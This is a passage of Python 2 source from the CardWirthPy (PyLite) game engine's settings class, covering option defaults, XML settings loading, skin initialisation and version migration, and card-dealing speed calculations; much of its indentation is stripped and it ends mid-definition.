self.initmoneyisinitialcash = True
self.autosave_partyrecord = False
self.overwrite_partyrecord = True
self.folderoftype = []
self.scenario_narrow = ""
self.scenario_narrowtype = 1
self.scenario_sorttype = 0
self.ssinfoformat = u"[%scenario%[(%author%)] - ][%party% at ]%yado%"
self.ssfnameformat = u"ScreenShot/[%yado%/[%party%_]]%year%%month%%day%_%hour%%minute%%second%[_in_%scenario%].png"
#self.cardssfnameformat = u"ScreenShot/[%yado%/[%party%_]]%year%%month%%day%_%hour%%minute%%second%[_in_%scenario%].png"
self.sswithstatusbar = True
self.titleformat = u"%application% %skin%[ - %yado%[ %scenario%]]"
self.playlogformat = u"PlayLog/%yado%/%party%_%year%%month%%day%_%hour%%minute%%second%_%scenario%.txt"
self.ssinfofontcolor = (0, 0, 0, 255)
self.ssinfobackcolor = (255, 255, 255, 255)
self.ssinfobackimage = u""
self.show_fcardsinbattle = False
self.statusbarmask = False
self.show_experiencebar = True
self.show_roundautostartbutton = True
self.show_autobuttoninentrydialog = True
self.unconvert_targetfolder = u"UnconvertedYado"
self.enabled_right_flick = False
self.flick_time_msec = 300
self.flick_distance = 20
self.can_skipwait = True
self.can_skipanimation = True
self.can_skipwait_with_wheel = True
self.can_forwardmessage_with_wheel = True
self.can_repeatlclick = False
self.cursor_type = CURSOR_WHITE
self.autoenter_on_sprite = False
self.blink_statusbutton = True
self.blink_partymoney = True
self.show_btndesc = True
self.protect_staredcard = True
self.protect_premiercard = True
self.show_cardkind = False
self.show_premiumicon = False
self.can_clicksidesofcardcontrol = False
self.radius_notdetectmovement = 5
self.show_paperandtree = False
self.filer_dir = ""
self.filer_file = ""
self.recenthistory_limit = 5 # 展開したシナリオを取っておく数
self.volume_increment = 5 # ホイールによる全体音量調節での増減量
self.write_playlog = False
self.move_repeat = 240 #移動ボタン押しっぱなしの速度
self.open_lastscenario = True
# アップデートに伴うファイルの自動移動・削除を行う
self.auto_update_files = True
# PyLite固有オプション
self.enable_equalbug = True
self.enable_oldf9 = False
self.display_logbutton = True#隠しオプション
self.display_scalebutton = True
self.display_noticeinfo = True
# 宿の表示順序
self.yado_order = {}
# 絞り込み・整列などのコントロールの表示有無
self.show_additional_yado = False
self.show_additional_player = False
self.show_additional_party = False
self.show_additional_scenario = False
self.show_additional_card = False
# 表示有無切替ボタン自体の表示有無
self.show_addctrlbtn = True
# カード種の表示・非表示
self.show_cardtype = [True] * 3
# カード選択ダイアログで選択中のカード種別
self.last_cardpocket = 0
# カード選択ダイアログでの転送先
self.last_sendto = 0
# カード選択ダイアログでのページ
self.last_storehousepage = 0
self.last_backpackpage = 0
self.last_cardpocketbpage = [0] * 3 # 荷物袋からの使用
# 一覧表示
self.show_multiplebases = False
self.show_multipleparties = False
self.show_multipleplayers = False
self.show_scenariotree = False
# シナリオのインストール先(キー=ルートディレクトリ毎)
self.installed_dir = {}
for t in inspect.getmembers(self, lambda t: not inspect.isroutine(t)):
if not t[0].startswith("__"):
if isinstance(t[1], list):
v = t[1][:]
elif hasattr(t[1], "copy"):
v = t[1].copy()
else:
v = t[1]
setattr(self, "%s_init" % (t[0]), v)
if not init:
return
if not loadfile:
if not os.path.isfile("Settings_Lite.xml"):
self.write()
self.init_skin()
self.set_dealspeed(self.dealspeed, self.dealspeed_battle, self.use_battlespeed)
self.data = cw.data.xml2etree("Settings_Lite.xml")
return
self.data = cw.data.xml2etree("Settings_Lite.xml")
elif os.path.isfile(loadfile):
self.data = cw.data.xml2etree(loadfile)
else:
return
data = self.data
settings_version = data.getattr(".", "dataVersion", "0")
self.local.load(data)
# シナリオエディタ
self.editor = data.gettext("ScenarioEditor", self.editor)
# 起動時の動作
self.startupscene = data.gettext("StartupScene", self.startupscene)
# 最後に選択した宿
self.lastyado = data.gettext("LastYado", self.lastyado)
# 最後に選択したシナリオ(ショートカットがあるため経路を記憶)
self.lastscenario = []
self.lastscenariopath = "" # 経路が辿れない時に使用するフルパス
# ウィンドウ位置
win_x = data.getint("WindowPosition", "left", -sys.maxint-1)
win_y = data.getint("WindowPosition", "top", -sys.maxint-1)
if -sys.maxint-1 == win_x:
win_x = None
if -sys.maxint-1 == win_y:
win_y = None
self.window_position = (win_x, win_y)
# 拡大モード
self.expandmode = data.gettext("ExpandMode", self.expandmode)
if self.expandmode == "None":
self.is_expanded = False
else:
self.is_expanded = data.getbool("ExpandMode", "expanded", self.is_expanded)
self.smoothexpand = data.getbool("ExpandMode", "smooth", self.smoothexpand)
# 描画倍率
if self.expandmode in ("None", "FullScreen"):
self.expanddrawing = 1.0
else:
try:
self.expanddrawing = float(self.expandmode)
except:
self.expanddrawing = 1.0
self.expanddrawing = data.getfloat("ExpandDrawing", self.expanddrawing)
if self.expanddrawing % 1 == 0:
self.expanddrawing = int(self.expanddrawing)
# デバッグモードかどうか
self.debug = data.getbool("DebugMode", self.debug)
self.debug_saved = self.debug
if not loadfile:
if cw.OPTIONS.debug:
# 強制デバッグモード起動
self.debug = True
cw.OPTIONS.debug = False
# デバッグ時はレベル上昇しない
self.no_levelup_in_debugmode = data.getbool("NoLevelUpInDebugMode", self.no_levelup_in_debugmode)
# 音楽を再生する
self.play_bgm = data.getbool("PlayBgm", self.play_bgm)
# 効果音を再生する
self.play_sound = data.getbool("PlaySound", self.play_sound)
# 音声全体のボリューム(0~1.0)
self.vol_master = data.getint("MasterVolume", int(self.vol_master_init * 100))
# 音楽のボリューム(0~1.0)
self.vol_bgm = data.getint("BgmVolume", int(self.vol_bgm_init * 100))
# midi音楽のボリューム(0~1.0)
self.vol_bgm_midi = data.getint("BgmVolume", "midi", self.vol_bgm)
# 効果音ボリューム
self.vol_sound = data.getint("SoundVolume", int(self.vol_sound_init * 100))
# midi効果音のボリューム(0~1.0)
self.vol_sound_midi = data.getint("SoundVolume", "midi", self.vol_sound)
# 音量の単位変更(0~100 to 0~1)
self.vol_master = Setting.wrap_volumevalue(self.vol_master)
self.vol_bgm = Setting.wrap_volumevalue(self.vol_bgm)
self.vol_bgm_midi = Setting.wrap_volumevalue(self.vol_bgm_midi)
self.vol_sound = Setting.wrap_volumevalue(self.vol_sound)
self.vol_sound_midi = Setting.wrap_volumevalue(self.vol_sound_midi)
# MIDIサウンドフォント
elements = data.find("SoundFonts", False)
if not elements is None:
self.soundfonts = []
for e in elements:
use = e.getbool(".", "enabled", True)
volume = e.getint(".", "volume", 100)
self.soundfonts.append((e.text, use, volume))
# 32bitオプションでMIDIを再生する
self.bassmidi_sample32bit = data.getbool("Bassmidi32bit", self.bassmidi_sample32bit)
# メッセージスピード(数字が小さいほど速い)(0~100)
self.messagespeed = data.getint("MessageSpeed", self.messagespeed)
self.messagespeed = cw.util.numwrap(self.messagespeed, 0, 100)
# カードの表示スピード(数字が小さいほど速い)(1~100)
dealspeed = data.getint("CardDealingSpeed", self.dealspeed)
# 戦闘行動の表示スピード(数字が小さいほど速い)(1~100)
dealspeed_battle = data.getint("CardDealingSpeedInBattle", self.dealspeed_battle)
use_battlespeed = data.getbool("CardDealingSpeedInBattle", "enabled", self.use_battlespeed)
self.set_dealspeed(dealspeed, dealspeed_battle, use_battlespeed)
# カードの使用前に空白時間を入れる
self.wait_usecard = data.getbool("WaitUseCard", self.wait_usecard)
# トランジション効果の種類
self.transition = data.gettext("Transition", self.transition)
self.transitionspeed = data.getint("Transition", "speed", self.transitionspeed)
self.transitionspeed = cw.util.numwrap(self.transitionspeed, 0, 10)
# 背景のスムーススケーリング
self.smoothscale_bg = data.getbool("SmoothScaling", "bg", self.smoothscale_bg)
self.smoothing_card_up = data.getbool("SmoothScaling", "upcard", self.smoothing_card_up)
self.smoothing_card_down = data.getbool("SmoothScaling", "downcard", self.smoothing_card_down)
# 保存せずに終了しようとしたら警告
self.caution_beforesaving = data.getbool("CautionBeforeSaving", self.caution_beforesaving)
# レベル調節で手放したカードを自動的に戻す
self.revert_cardpocket = data.getbool("RevertCardPocket", self.revert_cardpocket)
# キャンプ等に高速で切り替える
self.quickdeal = data.getbool("QuickDeal", self.quickdeal)
# 全てのシステムカードを高速表示する
self.all_quickdeal = data.getbool("AllQuickDeal", self.all_quickdeal)
# ソート基準
self.sort_yado = data.getattr("SortKey", "yado", self.sort_yado)
self.sort_standbys = data.getattr("SortKey", "standbys", self.sort_standbys)
self.sort_parties = data.getattr("SortKey", "parties", self.sort_parties)
self.sort_cards = data.getattr("SortKey", "cards", self.sort_cards)
self.sort_cardswithstar = data.getbool("SortKey", "cardswithstar", self.sort_cardswithstar)
# 拠点絞込条件
self.yado_narrowtype = data.getint("YadoNarrowType", self.yado_narrowtype)
# 宿帳絞込条件
self.standbys_narrowtype = data.getint("StandbysNarrowType", self.standbys_narrowtype)
# パーティ絞込条件
self.parties_narrowtype = data.getint("PartiesNarrowType", self.parties_narrowtype)
# カード絞込条件
self.card_narrowtype = data.getint("CardNarrowType", self.card_narrowtype)
# 情報カード絞込条件
self.infoview_narrowtype = data.getint("InfoViewNarrowType", self.infoview_narrowtype)
# メッセージログ最大数
self.backlogmax = data.getint("MessageLogMax", self.backlogmax)
# メッセージログ表示形式
self.messagelog_type = data.gettext("MessageLogType", self.messagelog_type)
self.showfps = False
# スキンによってシナリオの選択開始位置を変更する
self.selectscenariofromtype = data.getbool("SelectScenarioFromType", self.selectscenariofromtype)
# 適正レベル以外のシナリオを表示する
self.show_unfitnessscenario = data.getbool("ShowUnfitnessScenario", self.show_unfitnessscenario)
# 隠蔽シナリオを表示する
self.show_completedscenario = data.getbool("ShowCompletedScenario", self.show_completedscenario)
# 終了済シナリオを表示する
self.show_invisiblescenario = data.getbool("ShowInvisibleScenario", self.show_invisiblescenario)
# マウスホイールによるフォーカス移動
self.wheel_movefocus = data.getbool("WheelMoveFocus", self.wheel_movefocus)
# マウスホイールを上回転させた時の挙動
self.wheelup_operation = data.gettext("WheelUpOperation", self.wheelup_operation)
# 戦闘行動を全員分表示する
self.show_allselectedcards = data.getbool("ShowAllSelectedCards", self.show_allselectedcards)
# カード使用時に確認ダイアログを表示
self.confirm_beforeusingcard = data.getbool("ConfirmBeforeUsingCard", self.confirm_beforeusingcard)
# 売却・破棄時に確認ダイアログを表示
self.confirm_dumpcard = data.getbool("ConfirmDumpCard", self.confirm_dumpcard)
# セーブ前に確認ダイアログを表示
self.confirm_beforesaving = data.gettext("ConfirmBeforeSaving", self.confirm_beforesaving)
# セーブ完了時に確認ダイアログを表示
self.show_savedmessage = data.getbool("ShowSavedMessage", self.show_savedmessage)
# 不可能な行動を選択した時に警告を表示
self.noticeimpossibleaction = data.getbool("NoticeImpossibleAction", self.noticeimpossibleaction)
# 荷物袋のカードを一時的に取り出して使えるようにする
self.show_backpackcard = data.getbool("ShowBackpackCard", self.show_backpackcard)
# 荷物袋カードを最後に配置する
self.show_backpackcardatend = data.getbool("ShowBackpackCardAtEnd", self.show_backpackcardatend)
# 各種ステータスの残り時間を表示する
self.show_statustime = data.getbool("ShowStatusTime", self.show_statustime)
# パーティ結成時の持出金額
self.initmoneyamount = data.getint("InitialMoneyAmount", self.initmoneyamount)
self.initmoneyisinitialcash = data.getbool("InitialMoneyAmount", "sameasbase", self.initmoneyisinitialcash)
# 解散時、自動的にパーティ情報を記録する
self.autosave_partyrecord = data.getbool("AutoSavePartyRecord", self.autosave_partyrecord)
# 自動記録時、同名のパーティ記録へ上書きする
self.overwrite_partyrecord = data.getbool("OverwritePartyRecord", self.overwrite_partyrecord)
# シナリオフォルダ(スキンタイプ別)
for e_folder in data.getfind("ScenarioFolderOfSkinType", False):
skintype = e_folder.getattr(".", "skintype", "")
folder = e_folder.gettext(".", "")
self.folderoftype.append((skintype, folder))
# シナリオ絞込・整列条件
self.scenario_narrowtype = data.getint("ScenarioNarrowType", self.scenario_narrowtype)
self.scenario_sorttype = data.getint("ScenarioSortType", self.scenario_sorttype)
# スクリーンショット情報
self.ssinfoformat = data.gettext("ScreenShotInformationFormat", self.ssinfoformat_init)
# スクリーンショット情報の色
r = data.getint("ScreenShotInformationFontColor", "red", self.ssinfofontcolor_init[0])
g = data.getint("ScreenShotInformationFontColor", "green", self.ssinfofontcolor_init[1])
b = data.getint("ScreenShotInformationFontColor", "blue", self.ssinfofontcolor_init[2])
self.ssinfofontcolor = (r, g, b, 255)
r = data.getint("ScreenShotInformationBackgroundColor", "red", self.ssinfobackcolor_init[0])
g = data.getint("ScreenShotInformationBackgroundColor", "green", self.ssinfobackcolor_init[1])
b = data.getint("ScreenShotInformationBackgroundColor", "blue", self.ssinfobackcolor_init[2])
self.ssinfobackcolor = (r, g, b, 255)
# スクリーンショット情報の背景イメージ
self.ssinfobackimage = data.gettext("ScreenShotInformationBackgroundImage", self.ssinfobackimage_init)
# スクリーンショットのファイル名
self.ssfnameformat = data.gettext("ScreenShotFileNameFormat", self.ssfnameformat_init)
# 所持カード撮影情報のファイル名
#self.cardssfnameformat = data.gettext("ScreenShotOfCardsFileNameFormat", self.cardssfnameformat_init)
# スクリーンショットにステータスバーを含める
self.sswithstatusbar = data.getbool("ScreenShotWithStatusBar", self.sswithstatusbar_init)
# イベント中にステータスバーの色を変える
self.statusbarmask = data.getbool("StatusBarMask", self.statusbarmask)
# 次のレベルアップまでの割合を表示する
self.show_experiencebar = data.getbool("ShowExperienceBar", self.show_experiencebar)
# バトルラウンドを自動開始可能にする
self.show_roundautostartbutton = data.getbool("ShowRoundAutoStartButton", self.show_roundautostartbutton)
# 新規登録ダイアログに自動ボタンを表示する
self.show_autobuttoninentrydialog = data.getbool("ShowAutoButtonInEntryDialog", self.show_autobuttoninentrydialog)
# 逆変換先ディレクトリ
self.unconvert_targetfolder = data.gettext("UnconvertTargetFolder", self.unconvert_targetfolder)
# 右フリックで右クリック相当の操作を行う
self.enabled_right_flick = data.getbool("EnabledRightFlick", self.enabled_right_flick_init)
# 空白時間をスキップ可能にする
self.can_skipwait = data.getbool("CanSkipWait", self.can_skipwait)
# アニメーションをスキップ可能にする
self.can_skipanimation = data.getbool("CanSkipAnimation", self.can_skipanimation)
# マウスのホイールで空白時間とアニメーションをスキップする
self.can_skipwait_with_wheel = data.getbool("CanSkipWaitWithWheel", self.can_skipwait_with_wheel)
# マウスのホイールでメッセージ送りを行う
self.can_forwardmessage_with_wheel = data.getbool("CanForwardMessageWithWheel", self.can_forwardmessage_with_wheel)
# マウスの左ボタンを押し続けた時は連打状態にする
self.can_repeatlclick = data.getbool("CanRepeatLClick", self.can_repeatlclick)
# 方向キーやホイールの選択中にマウスカーソルの移動を検知しない半径
self.radius_notdetectmovement = data.getint("RadiusForNotDetectingCursorMovement", self.radius_notdetectmovement)
# カーソルタイプ
self.cursor_type = data.gettext("CursorType", self.cursor_type)
# 連打状態の時、カードなどの選択を自動的に決定する
self.autoenter_on_sprite = data.getbool("AutoEnterOnSprite", self.autoenter_on_sprite)
# 通知のあるステータスボタンを点滅させる
self.blink_statusbutton = data.getbool("BlinkStatusButton", self.blink_statusbutton)
# 所持金が増減した時に所持金欄を点滅させる
self.blink_partymoney = data.getbool("BlinkPartyMoney", self.blink_partymoney)
# ステータスバーのボタンの解説を表示する
self.show_btndesc = data.getbool("ShowButtonDescription", self.show_btndesc)
# スターつきのカードの売却や破棄を禁止する
self.protect_staredcard = data.getbool("ProtectStaredCard", self.protect_staredcard)
# プレミアカードの売却や破棄を禁止する
self.protect_premiercard = data.getbool("ProtectPremierCard", self.protect_premiercard)
# カード置場と荷物袋でカードの種類を表示する
self.show_cardkind = data.getbool("ShowCardKind", self.show_cardkind)
# カードの希少度をアイコンで表示する
self.show_premiumicon = data.getbool("ShowPremiumIcon", self.show_premiumicon)
# カード選択ダイアログの背景クリックで左右移動を行う
self.can_clicksidesofcardcontrol = data.getbool("CanClickSidesOfCardControl", self.can_clicksidesofcardcontrol)
# シナリオ選択ダイアログで貼紙と一覧を同時に表示する
self.show_paperandtree = data.getbool("ShowPaperAndTree", self.show_paperandtree)
# シナリオ選択ダイアログでのファイラー
self.filer_dir = data.gettext("FilerDirectory", self.filer_dir)
self.filer_file = data.gettext("FilerFile", self.filer_file)
# 圧縮されたシナリオの展開データ保存数
self.recenthistory_limit = data.getint("RecentHistoryLimit", self.recenthistory_limit)
# マウスホイールによる全体音量の増減量
self.volume_increment = data.getint("VolumeIncrement", self.volume_increment)
# 一覧表示
self.show_multiplebases = data.getbool("ShowMultipleItems", "base", self.show_multiplebases)
self.show_multipleparties = data.getbool("ShowMultipleItems", "party", self.show_multipleparties)
self.show_multipleplayers = data.getbool("ShowMultipleItems", "player", self.show_multipleplayers)
self.show_scenariotree = data.getbool("ShowMultipleItems", "scenario", self.show_scenariotree)
# タイトルバーの表示内容
self.titleformat = data.gettext("TitleFormat", self.titleformat)
# 宿の表示順
for e_yadoorder in data.getfind("YadoOrder", raiseerror=False):
if e_yadoorder.tag != "Order":
continue
name = e_yadoorder.getattr(".", "name")
order = int(e_yadoorder.text)
ypath = cw.util.join_paths("Yado", name, "Environment.xml")
if os.path.isfile(ypath):
self.yado_order[name] = order
# 絞り込み・整列などのコントロールの表示有無
self.show_additional_yado = data.getbool("ShowAdditionalControls", "yado", self.show_additional_yado)
self.show_additional_player = data.getbool("ShowAdditionalControls", "player", self.show_additional_player)
self.show_additional_party = data.getbool("ShowAdditionalControls", "party", self.show_additional_party)
self.show_additional_scenario = data.getbool("ShowAdditionalControls", "scenario", self.show_additional_scenario)
self.show_additional_card = data.getbool("ShowAdditionalControls", "card", self.show_additional_card)
# 絞り込み等の表示切替ボタンを表示する
self.show_addctrlbtn = data.gettext("ShowAdditionalControls", "" if self.show_addctrlbtn else "Hidden") <> "Hidden"
# シナリオのプレイログを出力する
self.write_playlog = data.getbool("WritePlayLog", self.write_playlog)
# プレイログのフォーマット
self.playlogformat = data.gettext("PlayLogFormat", self.playlogformat)
# アップデートに伴うファイルの自動移動・削除を行う
self.auto_update_files = data.getbool("AutoUpdateFiles", self.auto_update_files_init)
# シナリオのインストール先(キー=ルートディレクトリ)
e = data.find("InstalledPaths")
if not e is None:
for e_paths in e:
rootdir = e_paths.getattr(".", "root", "")
if not rootdir:
continue
dirstack = []
for e_path in e_paths:
if e_path.text:
dirstack.append(e_path.text)
self.installed_dir[rootdir] = dirstack
# スキン
self.skindirname = data.gettext("Skin", self.skindirname)
if not loadfile:
self.init_skin(basedata=basedata)
# 設定バージョンの更新 設定ファイルを独立させているため2.0以前のものはカット
if int(settings_version) < 4:
# バージョン3→4でMIDI音量をその他の音量と独立した設定に変更
self.vol_bgm_midi = self.vol_bgm * self.vol_bgm_midi
# PyLite:F9互換オプション
self.enable_oldf9 = data.getbool("EnableOldF9", self.enable_oldf9)
self.enable_equalbug = data.getbool("EnableEqualBug", self.enable_equalbug)
# 表示するステータスバーボタン
self.display_logbutton = data.getbool("DisplayLogButton", self.display_logbutton)
self.display_scalebutton = data.getbool("DisplayScaleButton", self.display_scalebutton)
self.display_scalebutton = data.getbool("DisplayNoticeInfo", self.display_noticeinfo)
# 最後に選んだシナリオを開始地点にする
self.open_lastscenario = data.getbool("OpenLastScenario", self.open_lastscenario)
def init_skin(self, basedata=None):
self.skindir = cw.util.join_paths(u"Data/Skin", self.skindirname)
if self.auto_update_files:
cw.update.update_files(self.skindir, self.skindirname)
if not os.path.isdir(self.skindir):
self.skindirname = "Classic"
self.skindir = cw.util.join_paths(u"Data/Skin", self.skindirname)
if not os.path.isdir(self.skindir):
# Classicが無いので手当たり次第にスキンを探す
for path in os.listdir(u"Data/Skin"):
dpath = cw.util.join_paths(u"Data/Skin", path)
fpath = cw.util.join_paths(dpath, "Skin.xml")
if os.path.isfile(fpath):
self.skindirname = path
self.skindir = dpath
break
if not os.path.isdir(self.skindir):
raise ValueError("Not found CardWirthPy skins!")
if basedata is None:
path = cw.util.join_paths("Data/SkinBase/Skin.xml")
basedata = cw.data.xml2etree(path)
path = cw.util.join_paths(self.skindir, "Skin.xml")
data = self._update_skin(path)
err = self._check_skin()
self.skindata = data
if err:
dlg = wx.MessageDialog(None, err, u"スキンチェックエラー", wx.OK|wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
raise
self.skinname = data.gettext("Property/Name", "")
self.skintype = data.gettext("Property/Type", "")
self.vocation120 = data.getbool("Property/CW120VocationLevel", False)
self._classicstyletext = data.getbool("Property/ClassicStyleText", False) # 設定バージョンアップデート用
self.initialcash = data.getint("Property/InitialCash", basedata.getint("Property/InitialCash", 4000))
# スキン・種族
self.races = [cw.header.RaceHeader(e) for e in data.getfind("Races")]
# 特性
self.sexes = [cw.features.Sex(e) for e in data.getfind("Sexes")]
self.sexnames = [f.name for f in self.sexes]
self.sexsubnames = [f.subname for f in self.sexes]
self.sexcoupons = [u"_" + f.name for f in self.sexes]
self.periods = [cw.features.Period(e) for e in data.getfind("Periods")]
self.periodnames = [f.name for f in self.periods]
self.periodsubnames = [f.subname for f in self.periods]
self.periodcoupons = [u"_" + f.name for f in self.periods]
self.natures = [cw.features.Nature(e) for e in data.getfind("Natures")]
self.naturenames = [f.name for f in self.natures]
self.naturecoupons = [u"_" + f.name for f in self.natures]
self.makings = [cw.features.Making(e) for e in data.getfind("Makings")]
self.makingnames = [f.name for f in self.makings]
self.makingcoupons = [u"_" + f.name for f in self.makings]
# デバグ宿で簡易生成を行う際の能力型
sampletypedescs = {}
for e in basedata.getfind("SampleTypes"):
sampletype = cw.features.SampleType(e)
sampletypedescs[sampletype.name] = sampletype.description
self.sampletypes = [cw.features.SampleType(e) for e in data.getfind(u"SampleTypes")]
for sampletype in self.sampletypes:
# 古いスキンでサンプルタイプの解説が無い場合があるので
# 同一名称のサンプルタイプがSkinBaseにあるようなら解説をコピーする
if sampletype.description == u"":
sampletype.description = sampletypedescs.get(sampletype.name, u"")
# 音声とメッセージは、選択中のスキンに
# 定義されていなければスキンベースのもので代替する
# 音声
self.sounds = {}
for e in basedata.getfind("Sounds"):
self.sounds[e.getattr(".", "key", "")] = e.gettext(".", "")
for e in data.getfind("Sounds"):
self.sounds[e.getattr(".", "key", "")] = e.gettext(".", "")
# メッセージ
self.msgs = _MsgDict()
for e in basedata.getfind("Messages"):
self.msgs[e.getattr(".", "key", "")] = e.gettext(".", "")
for e in data.getfind("Messages"):
self.msgs[e.getattr(".", "key", "")] = e.gettext(".", "")
# 未指定種族
self.unknown_race = cw.header.UnknownRaceHeader(self)
self.races.append(self.unknown_race)
# スキン判別用クーポン
syscoupons = data.find("SystemCoupons")
self.skinsyscoupons = SystemCoupons(fpath="", data=syscoupons)
# スキンローカル設定
data = data.find("Settings")
if data is None:
self.skin_local = self.local.copy()
else:
self.skin_local.load(data)
    def _update_skin(self, path):
        """Correct mistakes in skin data from older versions.

        Migrates the skin at *path* up to dataVersion 12 while holding a
        mutex on the skin directory, and returns the parsed skin tree.
        """
        dpath = os.path.dirname(path)
        # Serialize against other processes updating the same skin dir.
        while not cw.util.create_mutex(dpath):
            time.sleep(0.001)
        try:
            data = cw.data.xml2etree(path)
            skinversion = float(data.getattr(".", "dataVersion", "0"))
            update = False
            # As of 1.1 an environment with skin version 8 or lower is
            # unlikely, so anything older than that is not migrated.
            if skinversion <= 8:
                # Up to dataVersion 8, `03_YadoInitial.xml` (the area
                # shown for a base with no data) did not exist, so
                # generate it.  The title-screen card positions are
                # adjusted as well.
                update = True
                fpath = cw.util.join_paths(self.skindir, u"Resource/Xml/Title/01_Title.xml")
                if os.path.isfile(fpath):
                    # Adjust the title-screen card positions
                    e = cw.data.xml2etree(fpath)
                    e_mcards = e.find("MenuCards")
                    if not e_mcards is None and len(e_mcards) == 2 and\
                            e_mcards.getattr(".", "spreadtype", "") == "Custom" and\
                            e_mcards[0].getint("Property/Location", "left", 0) == 231 and\
                            e_mcards[0].getint("Property/Location", "top", 0) == 156 and\
                            e_mcards[1].getint("Property/Location", "left", 0) == 316 and\
                            e_mcards[1].getint("Property/Location", "top", 0) == 156:
                        # Create a backup before editing
                        iver = skinversion
                        if iver % 1 == 0:
                            iver = int(iver)
                        dst = "%s.v%s" % (fpath, iver)
                        dst = cw.util.dupcheck_plus(dst, yado=False)
                        shutil.copy2(fpath, dst)
                        e.edit("MenuCards/MenuCard[1]/Property/Location", "233", "left")
                        e.edit("MenuCards/MenuCard[1]/Property/Location", "150", "top")
                        e.edit("MenuCards/MenuCard[2]/Property/Location", "318", "left")
                        e.edit("MenuCards/MenuCard[2]/Property/Location", "150", "top")
                        e.write()
                fpath1 = u"Data/SkinBase/Resource/Xml/Yado/03_YadoInitial.xml"
                fpath2 = cw.util.join_paths(self.skindir, u"Resource/Xml/Yado/03_YadoInitial.xml")
                if not os.path.isfile(fpath2):
                    shutil.copy2(fpath1, fpath2)
                    fpath3 = cw.util.join_paths(self.skindir, u"Resource/Xml/Yado/01_Yado.xml")
                    if os.path.isfile(fpath3):
                        # Populate the new area from the skin's own base
                        # area: card names/images and dialogs.
                        e = cw.data.xml2etree(fpath2)
                        e3 = cw.data.xml2etree(fpath3)
                        e_playerselect = None
                        e_returntitle = None
                        for e_mcard in e3.getfind("MenuCards", raiseerror=False):
                            command = e_mcard.getattr(".", "command", "")
                            arg = e_mcard.getattr(".", "arg", "")
                            if command == "ShowDialog" and arg == "PLAYERSELECT":
                                e_playerselect = e_mcard
                            elif command == "ShowDialog" and arg == "RETURNTITLE":
                                e_returntitle = e_mcard
                        if not e_playerselect is None:
                            e.edit("MenuCards/MenuCard[1]/Property/Name",
                                   e_playerselect.gettext("Property/Name"))
                            e.edit("MenuCards/MenuCard[1]/Property/ImagePath",
                                   e_playerselect.gettext("Property/ImagePath"))
                            e.edit("MenuCards/MenuCard[1]/Property/Description",
                                   e_playerselect.gettext("Property/Description"))
                        if not e_returntitle is None:
                            e.edit("MenuCards/MenuCard[2]/Property/Name",
                                   e_returntitle.gettext("Property/Name"))
                            e.edit("MenuCards/MenuCard[2]/Property/ImagePath",
                                   e_returntitle.gettext("Property/ImagePath"))
                            e.edit("MenuCards/MenuCard[2]/Property/Description",
                                   e_returntitle.gettext("Property/Description"))
                        e_bgimgs = e3.find("BgImages")
                        if not e_bgimgs is None:
                            e.remove(".", e.find("BgImages"))
                            e.insert(".", e_bgimgs, 1)
                        e_event = e3.find("Events")
                        if not e_event is None:
                            e.remove(".", e.find("Events"))
                            e.append(".", e_event)
                        e.write()
            if skinversion <= 9:
                # dataVersion 10 introduced the opening animation
                # definition; copy it from SkinBase when missing.
                fpath1 = u"Data/SkinBase/Resource/Xml/Animation/Opening.xml"
                fpath2 = cw.util.join_paths(self.skindir, u"Resource/Xml/Animation/Opening.xml")
                if not os.path.isfile(fpath2):
                    dpath = os.path.dirname(fpath2)
                    if not os.path.isdir(dpath):
                        os.makedirs(dpath)
                    shutil.copy2(fpath1, fpath2)
                    update = True
            if skinversion <= 11:
                # Only the school variant ships BGM files whose extension
                # is not `.mid`, so add information to assist the editor's
                # automatic conversion of skin resource extensions.
                if data.gettext("Property/Type", "") == "School":
                    fpath = cw.util.join_paths(self.skindir, u"Bgm/chime.mp3")
                    if os.path.isfile(fpath):
                        e_source = data.find("Property/SourceOfMaterialsIsClassicEngine")
                        if e_source is None:
                            e_source = cw.data.make_element("SourceOfMaterialsIsClassicEngine", str(True))
                            data.find("Property").append(e_source)
                            update = True
            if update:
                data.edit(".", "12", "dataVersion")
                data.write()
            return data
        finally:
            cw.util.release_mutex()
def _check_skin(self):
"""
必須リソースが欠けていないかチェックする。
今のところ、全てのリソースをチェックしているのではなく、
過去のアップデートで追加されたリソースのみ確認している。
"""
dpath = cw.util.join_paths(self.skindir, u"Resource/Xml/Yado")
for fname in os.listdir(dpath):
fpath = cw.util.join_paths(dpath, fname)
id = int(cw.header.GetName(fpath, tagname="Id").name)
if id == 3:
break
else:
return u"スキンにデータバージョン「9」で導入された「初期拠点」エリアが存在しません。\n" +\
u"スキンの自動アップデートに失敗した可能性があります。\n" +\
u"手動での修復を試みるか、スキンを再導入してください。"
fpath = cw.util.join_paths(self.skindir, u"Resource/Xml/Animation/Opening.xml")
if not os.path.isfile(fpath):
return u"スキンにデータバージョン「10」で導入されたオープニングアニメーション定義が存在しません。\n" + \
u"スキンの自動アップデートに失敗した可能性があります。\n" + \
u"手動での修復を試みるか、スキンを再導入してください。"
return u""
def set_dealspeed(self, value, battlevalue, usebattle):
self.dealspeed = value
self.dealspeed = cw.util.numwrap(self.dealspeed, 0, 10)
self.dealing_scales = self.create_dealingscales(self.dealspeed)
self.dealspeed_battle = battlevalue
self.dealspeed_battle = cw.util.numwrap(self.dealspeed_battle, 0, 10)
self.dealing_scales_battle = self.create_dealingscales(self.dealspeed_battle)
self.use_battlespeed = usebattle
def get_dealspeed(self, isbattle=False):
if isbattle and self.use_battlespeed:
return self.dealspeed_battle
else:
return self.dealspeed
def create_dealingscales(self, dealspeed):
dealspeed = cw.util.numwrap(dealspeed, 0, 10)
scales_len = dealspeed + 1
dealing_scales = [
int(math.cos(math.radians(90.0 * i / scales_len)) * 100)
for i in range(scales_len)
if i
]
return dealing_scales
def get_drawsetting(self):
if self.local.important_draw or not self.skin_local.important_draw:
return self.local
else:
return self.skin_local
def get_fontsetting(self):
if self.local.important_font or not self.skin_local.important_font:
return self.local
else:
return self.skin_local
def get_inusecardalpha(self, sprite):
alpha = 210
if not sprite.alpha is None:
alpha = min(alpha, sprite.alpha)
return alpha
    # Read-only convenience properties.  Each one delegates to whichever
    # settings object is currently in effect (global vs. skin-local), as
    # chosen by get_drawsetting() / get_fontsetting().
    @property
    def mwincolour(self):
        # Message window background colour.
        return self.get_drawsetting().mwincolour
    @property
    def mwinframecolour(self):
        # Message window frame colour.
        return self.get_drawsetting().mwinframecolour
    @property
    def blwincolour(self):
        # Backlog window background colour.
        return self.get_drawsetting().blwincolour
    @property
    def blwinframecolour(self):
        # Backlog window frame colour.
        return self.get_drawsetting().blwinframecolour
    @property
